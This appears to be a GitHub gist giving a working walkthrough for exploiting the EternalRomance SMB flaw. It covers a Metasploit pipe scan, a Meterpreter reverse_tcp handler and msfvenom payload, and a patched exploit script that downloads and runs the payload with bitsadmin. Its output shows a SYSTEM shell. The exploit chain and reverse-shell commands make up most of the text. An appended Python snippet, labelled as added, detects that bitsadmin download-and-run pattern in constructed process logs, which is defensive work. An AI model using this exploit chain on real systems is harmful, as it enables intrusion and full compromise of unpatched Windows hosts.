@xillwillx
Last active September 19, 2018 19:03
EternalRomance Python Example with ReverseTCP Meterpreter
# Test victim IP first to see if exploitable
msfconsole
use auxiliary/scanner/smb/pipe_auditor
set RHOSTS 192.168.128.19
exploit
# choose pipe name 'netlogon'
######Exploiting the Victim##########
# Setup Meterpreter Handler
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
touch meterpreter.rc
echo use exploit/multi/handler >> meterpreter.rc
echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
echo set LHOST $IP >> meterpreter.rc
echo set ExitOnSession false >> meterpreter.rc
echo exploit -j -z >> meterpreter.rc
cat meterpreter.rc
msfconsole -r meterpreter.rc
# in a new tab Create Meterpreter payload in www dir
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP -f exe-service > /var/www/html/1.exe
# Start Webserver
service apache2 start
# Grab the exploit scripts and sed the script to run our meterpreter payload instead
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
wget https://www.exploit-db.com/download/42315 -O EternalRomance.py
wget https://github.com/worawit/MS17-010/raw/master/mysmb.py
sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" EternalRomance.py
sed -i -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''cmd \/c bitsadmin \/transfer wcb \/priority high http:\/\/'$IP'\/1.exe C:\\1.exe \&\& C:\\1.exe'\'')/g' EternalRomance.py
##################################
# Exploit that motherfucker (change the ip obviously)
python EternalRomance.py 192.168.128.19 netlogon
# Result should give you a meterpreter shell:
[*] Sending stage (957487 bytes) to 192.168.128.19
[*] Meterpreter session 1 opened (192.168.128.17:4444 -> 192.168.128.19:49176) at 2017-09-30 05:08:42 -0400
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
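From the defender's side, the command the patched script runs on the target (a bitsadmin download of the payload chained with its execution, launched as a service running as SYSTEM) is a recognisable pattern in process-creation telemetry. The following is an added example, not part of the gist: a minimal Python check over constructed process-creation records; the record field names, the parent image and the user values are assumptions, not taken from any real log source.

```python
import re

# Constructed sample process-creation records (not real telemetry). The first
# one mirrors the command line the modified EternalRomance.py launches above;
# the field layout (user/parent/cmdline) is an assumption for this example.
SAMPLE_EVENTS = [
    {"user": "NT AUTHORITY\\SYSTEM", "parent": "services.exe",
     "cmdline": r"cmd /c bitsadmin /transfer wcb /priority high "
                r"http://192.168.128.17/1.exe C:\1.exe && C:\1.exe"},
    {"user": "CORP\\alice", "parent": "explorer.exe",
     "cmdline": r"bitsadmin /transfer update /download "
                r"https://updates.example.com/patch.msi C:\Temp\patch.msi"},
    {"user": "CORP\\bob", "parent": "explorer.exe",
     "cmdline": r"notepad.exe C:\Users\bob\notes.txt"},
]

# bitsadmin /transfer fetching something over HTTP(S)
BITS_TRANSFER = re.compile(r"bitsadmin(\.exe)?\s+/transfer\b.*\bhttps?://", re.I)
# a downloaded file run in the same command line via a shell operator
CHAINED_EXEC = re.compile(r"(&&|&|;)\s*\S+\.(exe|bat|cmd|ps1)\b", re.I)


def score_event(ev):
    """Return the reasons an event resembles the BITS download-and-run chain."""
    reasons = []
    cmd = ev["cmdline"]
    if not BITS_TRANSFER.search(cmd):
        return reasons  # plain bitsadmin use is common; only flag remote transfers
    reasons.append("bitsadmin /transfer from a remote URL")
    if CHAINED_EXEC.search(cmd):
        reasons.append("downloaded file executed in the same command line")
    # service_exec in the exploit script starts the command through the SCM,
    # so the parent is the service host running as SYSTEM
    if ev["parent"].lower() == "services.exe" and "system" in ev["user"].lower():
        reasons.append("spawned by services.exe as SYSTEM")
    return reasons


def find_suspicious(events, min_reasons=2):
    """Return (cmdline, reasons) for events matching at least min_reasons indicators."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            hits.append((ev["cmdline"], reasons))
    return hits


if __name__ == "__main__":
    for cmdline, reasons in find_suspicious(SAMPLE_EVENTS):
        print(cmdline, "->", "; ".join(reasons))
```

A legitimate BITS download with no chained execution and an interactive parent scores only one indicator and is not reported at the default threshold.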